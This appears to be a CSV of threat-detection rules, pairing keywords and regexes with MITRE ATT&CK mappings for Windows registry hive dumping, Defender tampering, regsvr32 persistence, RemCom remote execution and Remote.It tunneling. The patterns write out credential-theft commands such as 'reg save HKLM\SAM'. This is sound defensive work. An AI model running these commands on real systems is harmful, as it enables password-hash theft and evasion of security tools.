"*reg save ""HK*L*M\s*ec*u*rit*y*"" update.exe*",".{0,1000}reg\ssave\s\""HK.{0,1000}L.{0,1000}M\\s.{0,1000}ec.{0,1000}u.{0,1000}rit.{0,1000}y.{0,1000}\""\supdate\.exe.{0,1000}","greyware_tool_keyword","reg","commands from wmiexec2.0 -  is the same wmiexec that everyone knows and loves (debatable). This 2.0 version is obfuscated to avoid well known signatures from various AV engines.","T1047 - T1027 - T1059","TA0005 - TA0002","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Discovery","https://github.com/ice-wzl/wmiexec2","1","1","N/A","N/A","9","1","27","1","2024-06-12T17:56:15Z","2023-02-07T22:10:08Z"
"*reg save hklm\sam *.dat*",".{0,1000}reg\ssave\shklm\\sam\s.{0,1000}\.dat.{0,1000}","greyware_tool_keyword","reg","saves a copy of the registry hive hklm\sam to a .dat file","T1005 - T1003.002","TA0005 - TA0003","N/A","Volt Typhoon","Collection","https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF","1","0","N/A","greyware_tools high risks of false positives","10","10","N/A","N/A","N/A","N/A"
"*reg save HKLM\SAM *c:*",".{0,1000}reg\ssave\sHKLM\\SAM\s.{0,1000}c\:.{0,1000}","greyware_tool_keyword","reg","the commands are used to export the SAM and SYSTEM registry hives which contain sensitive Windows security data including hashed passwords for local accounts. By obtaining these hives an attacker can attempt to crack the hashes or use them in pass-the-hash attacks for unauthorized access.","T1003.002","TA0009","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Collection","N/A","1","0","N/A","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A"
"*reg save hklm\sam sam*",".{0,1000}reg\ssave\shklm\\sam\ssam.{0,1000}","greyware_tool_keyword","reg","the commands are used to export the SAM and SYSTEM registry hives which contain sensitive Windows security data including hashed passwords for local accounts. By obtaining these hives an attacker can attempt to crack the hashes or use them in pass-the-hash attacks for unauthorized access.","T1003.002","TA0009","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Collection","N/A","1","0","N/A","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A"
"*reg save HKLM\SECURITY *c:*",".{0,1000}reg\ssave\sHKLM\\SECURITY\s.{0,1000}c\:.{0,1000}","greyware_tool_keyword","reg","saves a copy of the registry hive hklm\security to a .dat file","T1005 - T1003.002","TA0005 - TA0003","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Collection","https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a","1","0","N/A","greyware_tools high risks of false positives","10","10","N/A","N/A","N/A","N/A"
"*reg save hklm\system *.dat*",".{0,1000}reg\ssave\shklm\\system\s.{0,1000}\.dat.{0,1000}","greyware_tool_keyword","reg","saves a copy of the registry hive hklm\system to a .dat file","T1005 - T1003.002","TA0005 - TA0003","N/A","Volt Typhoon","Collection","https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF","1","0","N/A","greyware_tools high risks of false positives","10","10","N/A","N/A","N/A","N/A"
"*reg save HKLM\SYSTEM *c:*",".{0,1000}reg\ssave\sHKLM\\SYSTEM\s.{0,1000}c\:.{0,1000}","greyware_tool_keyword","reg","the commands are used to export the SAM and SYSTEM registry hives which contain sensitive Windows security data including hashed passwords for local accounts. By obtaining these hives an attacker can attempt to crack the hashes or use them in pass-the-hash attacks for unauthorized access.","T1003.002","TA0009","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Collection","N/A","1","0","N/A","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A"
"*reg save hklm\system system*",".{0,1000}reg\ssave\shklm\\system\ssystem.{0,1000}","greyware_tool_keyword","reg","the commands are used to export the SAM and SYSTEM registry hives which contain sensitive Windows security data including hashed passwords for local accounts. By obtaining these hives an attacker can attempt to crack the hashes or use them in pass-the-hash attacks for unauthorized access.","T1003.002","TA0009","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Collection","N/A","1","0","N/A","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A"
"*reg.exe add *HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction*",".{0,1000}reg\.exe\sadd\s.{0,1000}HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\sDefender\\Threats\\ThreatIDDefaultAction.{0,1000}","greyware_tool_keyword","reg","Windows Defender Tampering Via registry","T1489 - 	T1112","TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense Evasion","https://www.virustotal.com/gui/file/00820a1f0972678cfe7885bc989ab3e5602b0febc96baf9bf3741d56aa374f03/behavior","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*cmd /c regsvr32.exe /s C:\*\desktop.ini"" start= auto*",".{0,1000}cmd\s\/c\sregsvr32\.exe\s\/s\sC\:\\.{0,1000}\\desktop\.ini\""\sstart\=\sauto.{0,1000}","greyware_tool_keyword","regsvr32","suspicious service creation executing a desktop.ini file observed in a malware sample","T1543.003","TA0003","N/A","N/A","Persistence","https://www.virustotal.com/gui/file/faca8b6f046dad8f0e27a75fa2dc5477d3ccf44adced64481ef1b0dd968b4b0e/behavior","1","0","N/A","N/A","6","8","N/A","N/A","N/A","N/A"
"*regsvr32 AmsiProvider.dll*",".{0,1000}regsvr32\sAmsiProvider\.dll.{0,1000}","greyware_tool_keyword","regsvr32","A fake AMSI Provider which can be used for persistence","T1546.013 - T1574.012","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/netbiosX/AMSI-Provider","1","0","N/A","The AMSI Provider can be registered with the system by executing the following command from an elevated command prompt - risk of false positive","9","2","134","15","2021-05-16T16:56:15Z","2021-05-15T16:18:47Z"
"*sc create *cmd /c regsvr32.exe /s *\desktop.ini*",".{0,1000}sc\screate\s.{0,1000}cmd\s\/c\sregsvr32\.exe\s\/s\s.{0,1000}\\desktop\.ini.{0,1000}","greyware_tool_keyword","regsvr32","suspicious service creation executing a desktop.ini file observed in a malware sample","T1543.003","TA0003","N/A","N/A","Persistence","https://www.virustotal.com/gui/file/faca8b6f046dad8f0e27a75fa2dc5477d3ccf44adced64481ef1b0dd968b4b0e/behavior","1","0","N/A","N/A","6","8","N/A","N/A","N/A","N/A"
"* \\\\localhost /user:Username /pwd:Password  \""C:\\InstallMe.bat*",".{0,1000}\s\\\\\\\\localhost\s\/user\:Username\s\/pwd\:Password\s\s\\\""C\:\\\\InstallMe\.bat.{0,1000}","greyware_tool_keyword","RemCom","Remote Command Executor: A OSS replacement for PsExec and RunAs","T1077 - T1059 - T1021 - T1569.002","TA0002 - TA0005 - TA0008","N/A","N/A","Lateral Movement","https://github.com/kavika13/RemCom","1","0","N/A","N/A","10","4","335","94","2017-10-30T04:48:38Z","2011-11-09T11:00:09Z"
"* RemCom.exe*",".{0,1000}\sRemCom\.exe.{0,1000}","greyware_tool_keyword","RemCom","Remote Command Executor: A OSS replacement for PsExec and RunAs","T1077 - T1059 - T1021 - T1569.002","TA0002 - TA0005 - TA0008","N/A","N/A","Lateral Movement","https://github.com/kavika13/RemCom","1","0","N/A","N/A","10","4","335","94","2017-10-30T04:48:38Z","2011-11-09T11:00:09Z"
"* RemComSvc.exe*",".{0,1000}\sRemComSvc\.exe.{0,1000}","greyware_tool_keyword","RemCom","Remote Command Executor: A OSS replacement for PsExec and RunAs","T1077 - T1059 - T1021 - T1569.002","TA0002 - TA0005 - TA0008","N/A","N/A","Lateral Movement","https://github.com/kavika13/RemCom","1","0","N/A","N/A","10","4","335","94","2017-10-30T04:48:38Z","2011-11-09T11:00:09Z"
"* RemComSvc.h*",".{0,1000}\sRemComSvc\.h.{0,1000}","greyware_tool_keyword","RemCom","Remote Command Executor: A OSS replacement for PsExec and RunAs","T1077 - T1059 - T1021 - T1569.002","TA0002 - TA0005 - TA0008","N/A","N/A","Lateral Movement","https://github.com/kavika13/RemCom","1","0","N/A","N/A","10","4","335","94","2017-10-30T04:48:38Z","2011-11-09T11:00:09Z"
"*.\RemComSvc\*",".{0,1000}\.\\RemComSvc\\.{0,1000}","greyware_tool_keyword","RemCom","Remote Command Executor: A OSS replacement for PsExec and RunAs","T1077 - T1059 - T1021 - T1569.002","TA0002 - TA0005 - TA0008","N/A","N/A","Lateral Movement","https://github.com/kavika13/RemCom","1","0","N/A","N/A","10","4","335","94","2017-10-30T04:48:38Z","2011-11-09T11:00:09Z"
"*/RemCom.exe*",".{0,1000}\/RemCom\.exe.{0,1000}","greyware_tool_keyword","RemCom","Remote Command Executor: A OSS replacement for PsExec and RunAs","T1077 - T1059 - T1021 - T1569.002","TA0002 - TA0005 - TA0008","N/A","N/A","Lateral Movement","https://github.com/kavika13/RemCom","1","1","N/A","N/A","10","4","335","94","2017-10-30T04:48:38Z","2011-11-09T11:00:09Z"
"*/RemCom.git*",".{0,1000}\/RemCom\.git.{0,1000}","greyware_tool_keyword","RemCom","Remote Command Executor: A OSS replacement for PsExec and RunAs","T1077 - T1059 - T1021 - T1569.002","TA0002 - TA0005 - TA0008","N/A","N/A","Lateral Movement","https://github.com/kavika13/RemCom","1","1","N/A","N/A","10","4","335","94","2017-10-30T04:48:38Z","2011-11-09T11:00:09Z"
"*/RemComSvc.exe*",".{0,1000}\/RemComSvc\.exe.{0,1000}","greyware_tool_keyword","RemCom","Remote Command Executor: A OSS replacement for PsExec and RunAs","T1077 - T1059 - T1021 - T1569.002","TA0002 - TA0005 - TA0008","N/A","N/A","Lateral Movement","https://github.com/kavika13/RemCom","1","1","N/A","N/A","10","4","335","94","2017-10-30T04:48:38Z","2011-11-09T11:00:09Z"
"*[ talha.tariq@gmail.com ]*",".{0,1000}\[\stalha\.tariq\@gmail\.com\s\].{0,1000}","greyware_tool_keyword","RemCom","Remote Command Executor: A OSS replacement for PsExec and RunAs","T1077 - T1059 - T1021 - T1569.002","TA0002 - TA0005 - TA0008","N/A","N/A","Lateral Movement","https://github.com/kavika13/RemCom","1","0","N/A","N/A","10","4","335","94","2017-10-30T04:48:38Z","2011-11-09T11:00:09Z"
"*\RemCom.cpp*",".{0,1000}\\RemCom\.cpp.{0,1000}","greyware_tool_keyword","RemCom","Remote Command Executor: A OSS replacement for PsExec and RunAs","T1077 - T1059 - T1021 - T1569.002","TA0002 - TA0005 - TA0008","N/A","N/A","Lateral Movement","https://github.com/kavika13/RemCom","1","0","N/A","N/A","10","4","335","94","2017-10-30T04:48:38Z","2011-11-09T11:00:09Z"
"*\RemCom.exe*",".{0,1000}\\RemCom\.exe.{0,1000}","greyware_tool_keyword","RemCom","Remote Command Executor: A OSS replacement for PsExec and RunAs","T1077 - T1059 - T1021 - T1569.002","TA0002 - TA0005 - TA0008","N/A","N/A","Lateral Movement","https://github.com/kavika13/RemCom","1","0","N/A","N/A","10","4","335","94","2017-10-30T04:48:38Z","2011-11-09T11:00:09Z"
"*\RemCom.pdb*",".{0,1000}\\RemCom\.pdb.{0,1000}","greyware_tool_keyword","RemCom","Remote Command Executor: A OSS replacement for PsExec and RunAs","T1077 - T1059 - T1021 - T1569.002","TA0002 - TA0005 - TA0008","N/A","N/A","Lateral Movement","https://github.com/kavika13/RemCom","1","0","N/A","N/A","10","4","335","94","2017-10-30T04:48:38Z","2011-11-09T11:00:09Z"
"*\RemCom.vcxproj*",".{0,1000}\\RemCom\.vcxproj.{0,1000}","greyware_tool_keyword","RemCom","Remote Command Executor: A OSS replacement for PsExec and RunAs","T1077 - T1059 - T1021 - T1569.002","TA0002 - TA0005 - TA0008","N/A","N/A","Lateral Movement","https://github.com/kavika13/RemCom","1","0","N/A","N/A","10","4","335","94","2017-10-30T04:48:38Z","2011-11-09T11:00:09Z"
"*\RemCom-master\*",".{0,1000}\\RemCom\-master\\.{0,1000}","greyware_tool_keyword","RemCom","Remote Command Executor: A OSS replacement for PsExec and RunAs","T1077 - T1059 - T1021 - T1569.002","TA0002 - TA0005 - TA0008","N/A","N/A","Lateral Movement","https://github.com/kavika13/RemCom","1","0","N/A","N/A","10","4","335","94","2017-10-30T04:48:38Z","2011-11-09T11:00:09Z"
"*\RemComSvc.exe*",".{0,1000}\\RemComSvc\.exe.{0,1000}","greyware_tool_keyword","RemCom","Remote Command Executor: A OSS replacement for PsExec and RunAs","T1077 - T1059 - T1021 - T1569.002","TA0002 - TA0005 - TA0008","N/A","N/A","Lateral Movement","https://github.com/kavika13/RemCom","1","0","N/A","N/A","10","4","335","94","2017-10-30T04:48:38Z","2011-11-09T11:00:09Z"
"*\RemComSvc\*",".{0,1000}\\RemComSvc\\.{0,1000}","greyware_tool_keyword","RemCom","Remote Command Executor: A OSS replacement for PsExec and RunAs","T1077 - T1059 - T1021 - T1569.002","TA0002 - TA0005 - TA0008","N/A","N/A","Lateral Movement","https://github.com/kavika13/RemCom","1","0","N/A","N/A","10","4","335","94","2017-10-30T04:48:38Z","2011-11-09T11:00:09Z"
"*\Remote Command Executor.sln*",".{0,1000}\\Remote\sCommand\sExecutor\.sln.{0,1000}","greyware_tool_keyword","RemCom","Remote Command Executor: A OSS replacement for PsExec and RunAs","T1077 - T1059 - T1021 - T1569.002","TA0002 - TA0005 - TA0008","N/A","N/A","Lateral Movement","https://github.com/kavika13/RemCom","1","0","N/A","N/A","10","4","335","94","2017-10-30T04:48:38Z","2011-11-09T11:00:09Z"
"*0d8f28ea01d3866ad7ee4abbdc5bdfd83d41702dcf029584ef30cb0055be8538*",".{0,1000}0d8f28ea01d3866ad7ee4abbdc5bdfd83d41702dcf029584ef30cb0055be8538.{0,1000}","greyware_tool_keyword","RemCom","Remote Command Executor: A OSS replacement for PsExec and RunAs","T1077 - T1059 - T1021 - T1569.002","TA0002 - TA0005 - TA0008","N/A","N/A","Lateral Movement","https://github.com/kavika13/RemCom","1","0","#filehash","N/A","10","4","335","94","2017-10-30T04:48:38Z","2011-11-09T11:00:09Z"
"*29548EB7-5E44-21F9-5C82-15DDDC80449A*",".{0,1000}29548EB7\-5E44\-21F9\-5C82\-15DDDC80449A.{0,1000}","greyware_tool_keyword","RemCom","Remote Command Executor: A OSS replacement for PsExec and RunAs","T1077 - T1059 - T1021 - T1569.002","TA0002 - TA0005 - TA0008","N/A","N/A","Lateral Movement","https://github.com/kavika13/RemCom","1","0","#GUIDproject","N/A","10","4","335","94","2017-10-30T04:48:38Z","2011-11-09T11:00:09Z"
"*8CC59FFA-00E0-0AEA-59E8-E780672C3CB3*",".{0,1000}8CC59FFA\-00E0\-0AEA\-59E8\-E780672C3CB3.{0,1000}","greyware_tool_keyword","RemCom","Remote Command Executor: A OSS replacement for PsExec and RunAs","T1077 - T1059 - T1021 - T1569.002","TA0002 - TA0005 - TA0008","N/A","N/A","Lateral Movement","https://github.com/kavika13/RemCom","1","0","#GUIDproject","N/A","10","4","335","94","2017-10-30T04:48:38Z","2011-11-09T11:00:09Z"
"*C7038612-8183-67A7-8A9C-1379C2674156*",".{0,1000}C7038612\-8183\-67A7\-8A9C\-1379C2674156.{0,1000}","greyware_tool_keyword","RemCom","Remote Command Executor: A OSS replacement for PsExec and RunAs","T1077 - T1059 - T1021 - T1569.002","TA0002 - TA0005 - TA0008","N/A","N/A","Lateral Movement","https://github.com/kavika13/RemCom","1","0","#GUIDproject","N/A","10","4","335","94","2017-10-30T04:48:38Z","2011-11-09T11:00:09Z"
"*define RemComSVCEXE*",".{0,1000}define\sRemComSVCEXE.{0,1000}","greyware_tool_keyword","RemCom","Remote Command Executor: A OSS replacement for PsExec and RunAs","T1077 - T1059 - T1021 - T1569.002","TA0002 - TA0005 - TA0008","N/A","N/A","Lateral Movement","https://github.com/kavika13/RemCom","1","0","N/A","N/A","10","4","335","94","2017-10-30T04:48:38Z","2011-11-09T11:00:09Z"
"*eee20962a1056f525bbe1c99c656794511697e510221522e7d62efd943457190*",".{0,1000}eee20962a1056f525bbe1c99c656794511697e510221522e7d62efd943457190.{0,1000}","greyware_tool_keyword","RemCom","Remote Command Executor: A OSS replacement for PsExec and RunAs","T1077 - T1059 - T1021 - T1569.002","TA0002 - TA0005 - TA0008","N/A","N/A","Lateral Movement","https://github.com/kavika13/RemCom","1","0","#filehash","N/A","10","4","335","94","2017-10-30T04:48:38Z","2011-11-09T11:00:09Z"
"*kavika13/RemCom*",".{0,1000}kavika13\/RemCom.{0,1000}","greyware_tool_keyword","RemCom","Remote Command Executor: A OSS replacement for PsExec and RunAs","T1077 - T1059 - T1021 - T1569.002","TA0002 - TA0005 - TA0008","N/A","N/A","Lateral Movement","https://github.com/kavika13/RemCom","1","1","N/A","N/A","10","4","335","94","2017-10-30T04:48:38Z","2011-11-09T11:00:09Z"
"*RemCom - Win32 Debug*",".{0,1000}RemCom\s\-\sWin32\sDebug.{0,1000}","greyware_tool_keyword","RemCom","Remote Command Executor: A OSS replacement for PsExec and RunAs","T1077 - T1059 - T1021 - T1569.002","TA0002 - TA0005 - TA0008","N/A","N/A","Lateral Movement","https://github.com/kavika13/RemCom","1","0","N/A","N/A","10","4","335","94","2017-10-30T04:48:38Z","2011-11-09T11:00:09Z"
"*RemCom - Win32 Release*",".{0,1000}RemCom\s\-\sWin32\sRelease.{0,1000}","greyware_tool_keyword","RemCom","Remote Command Executor: A OSS replacement for PsExec and RunAs","T1077 - T1059 - T1021 - T1569.002","TA0002 - TA0005 - TA0008","N/A","N/A","Lateral Movement","https://github.com/kavika13/RemCom","1","0","N/A","N/A","10","4","335","94","2017-10-30T04:48:38Z","2011-11-09T11:00:09Z"
"*RemComSvc - Win32 Debug*",".{0,1000}RemComSvc\s\-\sWin32\sDebug.{0,1000}","greyware_tool_keyword","RemCom","Remote Command Executor: A OSS replacement for PsExec and RunAs","T1077 - T1059 - T1021 - T1569.002","TA0002 - TA0005 - TA0008","N/A","N/A","Lateral Movement","https://github.com/kavika13/RemCom","1","0","N/A","N/A","10","4","335","94","2017-10-30T04:48:38Z","2011-11-09T11:00:09Z"
"*RemComSvc - Win32 Release*",".{0,1000}RemComSvc\s\-\sWin32\sRelease.{0,1000}","greyware_tool_keyword","RemCom","Remote Command Executor: A OSS replacement for PsExec and RunAs","T1077 - T1059 - T1021 - T1569.002","TA0002 - TA0005 - TA0008","N/A","N/A","Lateral Movement","https://github.com/kavika13/RemCom","1","0","N/A","N/A","10","4","335","94","2017-10-30T04:48:38Z","2011-11-09T11:00:09Z"
"* remoteit.exe*",".{0,1000}\sremoteit\.exe.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/desktop","1","0","N/A","N/A","10","10","39","10","2024-08-27T01:12:50Z","2019-01-12T00:59:20Z"
"* remoteit.x86-win.exe*",".{0,1000}\sremoteit\.x86\-win\.exe.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/desktop","1","0","N/A","N/A","10","10","39","10","2024-08-27T01:12:50Z","2019-01-12T00:59:20Z"
"* remoteit-desktop.exe*",".{0,1000}\sremoteit\-desktop\.exe.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/desktop","1","0","N/A","N/A","10","10","39","10","2024-08-27T01:12:50Z","2019-01-12T00:59:20Z"
"*/Applications/remoteit.app/*",".{0,1000}\/Applications\/remoteit\.app\/.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/desktop","1","0","N/A","N/A","10","10","39","10","2024-08-27T01:12:50Z","2019-01-12T00:59:20Z"
"*/bin/x64/connectd.exe*",".{0,1000}\/bin\/x64\/connectd\.exe.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/desktop","1","1","N/A","N/A","10","10","39","10","2024-08-27T01:12:50Z","2019-01-12T00:59:20Z"
"*/connectd.aarch64-win.exe*",".{0,1000}\/connectd\.aarch64\-win\.exe.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/desktop","1","1","N/A","N/A","10","10","39","10","2024-08-27T01:12:50Z","2019-01-12T00:59:20Z"
"*/connectd.x86_64-win.exe*",".{0,1000}\/connectd\.x86_64\-win\.exe.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/desktop","1","1","N/A","N/A","10","10","39","10","2024-08-27T01:12:50Z","2019-01-12T00:59:20Z"
"*/etc/remoteit/*",".{0,1000}\/etc\/remoteit\/.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/desktop","1","0","N/A","N/A","10","10","39","10","2024-08-27T01:12:50Z","2019-01-12T00:59:20Z"
"*/opt/remoteit/remoteit*",".{0,1000}\/opt\/remoteit\/remoteit.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/desktop","1","0","N/A","N/A","10","10","39","10","2024-08-27T01:12:50Z","2019-01-12T00:59:20Z"
"*/Remote.It-Installer-*",".{0,1000}\/Remote\.It\-Installer\-.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/desktop","1","1","N/A","N/A","10","10","39","10","2024-08-27T01:12:50Z","2019-01-12T00:59:20Z"
"*/remoteit.exe*",".{0,1000}\/remoteit\.exe.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/desktop","1","1","N/A","N/A","10","10","39","10","2024-08-27T01:12:50Z","2019-01-12T00:59:20Z"
"*/remoteit.x86-win.exe*",".{0,1000}\/remoteit\.x86\-win\.exe.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/desktop","1","1","N/A","N/A","10","10","39","10","2024-08-27T01:12:50Z","2019-01-12T00:59:20Z"
"*/remoteit/connectd/releases*",".{0,1000}\/remoteit\/connectd\/releases.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","1","N/A","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*/remoteit/desktop*",".{0,1000}\/remoteit\/desktop.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/desktop","1","1","N/A","N/A","10","10","39","10","2024-08-27T01:12:50Z","2019-01-12T00:59:20Z"
"*/remoteit-desktop.exe*",".{0,1000}\/remoteit\-desktop\.exe.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/desktop","1","1","N/A","N/A","10","10","39","10","2024-08-27T01:12:50Z","2019-01-12T00:59:20Z"
"*/systemd/system/connectd.service*",".{0,1000}\/systemd\/system\/connectd\.service.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","N/A","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*/usr/bin/connectd*",".{0,1000}\/usr\/bin\/connectd.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","N/A","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*/usr/bin/logger logger ""connectd installer postinst*",".{0,1000}\/usr\/bin\/logger\slogger\s\""connectd\sinstaller\spostinst.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","N/A","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*/usr/share/connectd/scripts/*",".{0,1000}\/usr\/share\/connectd\/scripts\/.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","N/A","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*/var/log/remoteit*",".{0,1000}\/var\/log\/remoteit.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/desktop","1","0","N/A","N/A","10","10","39","10","2024-08-27T01:12:50Z","2019-01-12T00:59:20Z"
"*\AppData\Local\remoteit*",".{0,1000}\\AppData\\Local\\remoteit.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/desktop","1","0","N/A","N/A","10","10","39","10","2024-08-27T01:12:50Z","2019-01-12T00:59:20Z"
"*\connectd.aarch64-win.exe*",".{0,1000}\\connectd\.aarch64\-win\.exe.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/desktop","1","0","N/A","N/A","10","10","39","10","2024-08-27T01:12:50Z","2019-01-12T00:59:20Z"
"*\connectd.x86_64-win.exe*",".{0,1000}\\connectd\.x86_64\-win\.exe.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/desktop","1","0","N/A","N/A","10","10","39","10","2024-08-27T01:12:50Z","2019-01-12T00:59:20Z"
"*\Program Files\remoteit*",".{0,1000}\\Program\sFiles\\remoteit.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/desktop","1","0","N/A","N/A","10","10","39","10","2024-08-27T01:12:50Z","2019-01-12T00:59:20Z"
"*\ProgramData\remoteit*",".{0,1000}\\ProgramData\\remoteit.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/desktop","1","0","N/A","N/A","10","10","39","10","2024-08-27T01:12:50Z","2019-01-12T00:59:20Z"
"*\Remote.It-Installer-*",".{0,1000}\\Remote\.It\-Installer\-.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/desktop","1","0","N/A","N/A","10","10","39","10","2024-08-27T01:12:50Z","2019-01-12T00:59:20Z"
"*\remoteit.exe*",".{0,1000}\\remoteit\.exe.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/desktop","1","0","N/A","N/A","10","10","39","10","2024-08-27T01:12:50Z","2019-01-12T00:59:20Z"
"*\remoteit.log*",".{0,1000}\\remoteit\.log.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/desktop","1","0","N/A","N/A","10","10","39","10","2024-08-27T01:12:50Z","2019-01-12T00:59:20Z"
"*\remoteit.x86-win.exe*",".{0,1000}\\remoteit\.x86\-win\.exe.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/desktop","1","0","N/A","N/A","10","10","39","10","2024-08-27T01:12:50Z","2019-01-12T00:59:20Z"
"*\remoteit-desktop.exe*",".{0,1000}\\remoteit\-desktop\.exe.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/desktop","1","0","N/A","N/A","10","10","39","10","2024-08-27T01:12:50Z","2019-01-12T00:59:20Z"
"*\remoteit-headless.service*",".{0,1000}\\remoteit\-headless\.service.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/desktop","1","0","N/A","N/A","10","10","39","10","2024-08-27T01:12:50Z","2019-01-12T00:59:20Z"
"*>Remote.it<*",".{0,1000}\>Remote\.it\<.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/desktop","1","0","N/A","N/A","10","10","39","10","2024-08-27T01:12:50Z","2019-01-12T00:59:20Z"
